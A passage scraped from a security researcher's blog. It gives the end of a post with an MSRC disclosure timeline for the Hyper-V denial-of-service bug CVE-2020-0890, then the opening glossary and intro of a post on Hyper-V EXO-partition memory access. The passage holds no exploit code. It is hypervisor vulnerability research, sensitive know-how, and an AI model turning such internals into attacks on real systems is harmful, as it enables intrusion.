msr. </span></p></li></ul><div><span style="font-family: calibri, sans-serif;"><span style="font-size: 10.6667px; white-space: pre-wrap;"><br /></span></span></div><div><span style="font-family: calibri, sans-serif;"><span style="font-size: 10.6667px; white-space: pre-wrap;"><span> </span><span> </span><span> </span><span> </span><span> </span>Patch is simple:</span></span></div><div><span style="font-family: calibri, sans-serif;"><span style="font-size: 10.6667px; white-space: pre-wrap;"><br /></span></span></div><div><span style="font-family: calibri, sans-serif;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHfeV6iUnP6HW1i3lh9cfsv307WPZt3g003rhSbpUHHPnOpVA6Jy0vVgW4CNVLdg0gUrZ1zxsGw_PYvBKLxx4DvtGmgqM6GllJKDV4jj0lDOl3zzHXXDT4sWqjPCFvMzthjq3OrlZPMEXL/s1936/compare.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1437" data-original-width="1936" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHfeV6iUnP6HW1i3lh9cfsv307WPZt3g003rhSbpUHHPnOpVA6Jy0vVgW4CNVLdg0gUrZ1zxsGw_PYvBKLxx4DvtGmgqM6GllJKDV4jj0lDOl3zzHXXDT4sWqjPCFvMzthjq3OrlZPMEXL/s320/compare.png" width="320" /></a></div><br /><span style="font-size: 10.6667px; white-space: pre-wrap;"><br /></span></span></div><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">MSRC communications history:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">21 august 2020 – first submission was opened but next rejected, because of attach was blocked on some mail server.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">21 august 2020 – second submission was opened.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">22 august 2020 – case for second submission was opened.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">24 august 2020 – DoS behavior of PoC was confirmed.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">27 august 2020 – MSRC message – «Our team has completed a fix for this issue, and we plan on releasing it as part of the September Update Tuesday, assuming there are no issues during the next few weeks of testing. We have assigned CVE-2020-0890 to this issue».</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">31 august 2020 – MSRC bounty program message: «So the first report was sent to us months before we received you submission».</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">08 september 2020 - <a href="https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0890" target="_blank">CVE-2020-0890</a> was published.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I still don’t believe in «sent to us months before», because of bug was not patched in Windows Insider builds )</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Very dark story. It looks like program manager did not pass some information to developer team.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Update: According </span><span style="font-size: 10.6667px; white-space: pre-wrap;"> </span><a href="https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0890" style="font-size: 10.6667px; white-space: pre-wrap;" target="_blank">CVE-2020-0890</a> <span style="font-size: 10.6667px; white-space: pre-wrap;">was discovered by another researcher first, but it was presented in Windows 10, build 1803 (April 2018). It means, that vulnerability was presented during 2,5 year, was discovered by another researcher, but was patched during 18 day after my report. </span><span style="font-size: x-small;"><span style="white-space: pre-wrap;">Y</span>ou can independently calculate the probability of such events )</span><span style="font-size: small; white-space: pre-wrap;"> </span></p></span>Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-59783227137138080502020-06-19T13:49:00.000-07:002020-06-19T13:49:44.363-07:00Hyper-V memory internals. EXO partition memory access<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="font-family: "calibri" , sans-serif; font-size: 8pt; text-align: left;"> <b> </b> Software, used in article (operation systems have June 2020 patches):</span></div>
<div>
<div style="text-align: center;">
<span style="font-family: "calibri" , sans-serif; font-size: 8pt; text-align: left; text-indent: 35.4pt; white-space: pre-wrap;"><br /></span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10 20H1, build 19041 x64</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10 1803 x64</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMware Workstation 20H2 preview</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VirtualBox 6.1.8</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">LiveCloudKd</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Process Hacker</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PyKd plugin for WinDBG</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG Preview</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0p;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> The testing lab works on Intel-based PC. Therefore, Intel specific Hyper-V terms: hvix64.exe will be used in article context. By the way, Windows 10 20H2 preview from build 19640 supports nested AMD virtualization (</span><a href="https://techcommunity.microsoft.com/t5/virtualization/amd-nested-virtualization-support/ba-p/1434841" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://techcommunity.microsoft.com/t5/virtualization/amd-nested-virtualization-support/ba-p/1434841</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), and it looks like more PC will be working with Hyper-V.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<div style="text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Terms and definitions:</span></div>
</div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WDAG – </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Defender Application Guard (</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">MDAG</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Microsoft Defender Application Guard for newer Windows versions);</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Full VM (virtual machine)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – virtual machine, which was created in Hyper-V manager. Differs from WDAG container, Windows Sandbox, docker in Hyper-V isolation mode;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Root OS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – operation system, where server part of Hyper-V is working;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest OS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – operation system, which works in Hyper-V emulation context, uses virtual devices, which is presented by Hyper-V infrastructure. It can be Full VM, Hyper-V containers, WHVP-based VM;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">TLFS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Hypervisor Top-Level Functional Specification 6.0;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GPA (guest physical address)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Guest OS physical memory address;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SPA (system physical address)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Root OS physical memory address;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercall</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – hypervisor service function, which is called by vmcall execution with specifying hypercall number;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VBS – </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Virtualization Based Security;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VPN –</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> virtual page number;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GPN</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – guest page number;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EXO-partition</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – partition object, which is created, when virtual machines is running using Windows Hypervisor Platform API;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WHVP API</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Windows HyperVisor Platform API.</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
</ul>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<div style="text-align: left;">
<div style="text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Intro</span></div>
</div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V virtualization platform, developed by Microsoft, appeared a long time ago - the first report about it was published at the WinHec conference in 2006, the platform was integrated into Windows Server 2008. At first, Microsoft rather willingly shared an API functions description, they were even present in Microsoft Windows SDK 7.0, but then their policy changed, and official information about Hyper-V interfaces became less and less, it was presented only in Hyper-V Top Level Function Specification provided for developers of operating systems, who want make to do their OS compatible with Hyper-V. The problem arose, after Microsoft introduced Virtualization Based Security (VBS) technology in Windows 10, which components (Device Guard, Code Integrity and Credential Guard) use Hyper-V for protection critical components of the operating system, even without starting the guest OS. It turned out that existing virtualization systems such as Qemu, VirtualBox and VMware Workstation can’t work in such conditions, when using hardware virtualization features. Hyper-V just blocked them, when it running.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VBS appeared in Windows 10, build 1511 Enterprise (November 2015). It must be specially activated as the Windows feature option, but in 1607 build VBS component was already integrated into the OS by default (</span><a href="https://docs.microsoft.com/ru-ru/windows/security/identity-protection/credential-guard/credential-guard-manage" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/ru-ru/windows/security/identity-protection/credential-guard/credential-guard-manage</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) and it just needed to be activated. Next stage, in December 2019, Microsoft decided to activate VBS option as default </span><a href="https://techcommunity.microsoft.com/t5/virtualization/virtualization-based-security-enabled-by-default/ba-p/890167" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://techcommunity.microsoft.com/t5/virtualization/virtualization-based-security-enabled-by-default/ba-p/890167</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> which led to the failure of virtualization applications created by third-party developers.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For solving that problem Microsoft has developed the Windows Hypervisor Platform API (</span><a href="https://docs.microsoft.com/en-us/virtualization/api/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/virtualization/api/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), which provide the following features for third-party developers:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1. Creation and management of Hyper-V “partitions”;</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2. Memory management for each partition;</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3. Virtual processors management of Hyper-V.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The main point of this APIs is to provide the ability to manage processor resources, read\write register values, start\stop processor, and generate interrupts. The result was a certain absolute minimum for working with a virtual partition.</span></div>
</div>
<div style="text-align: left;">
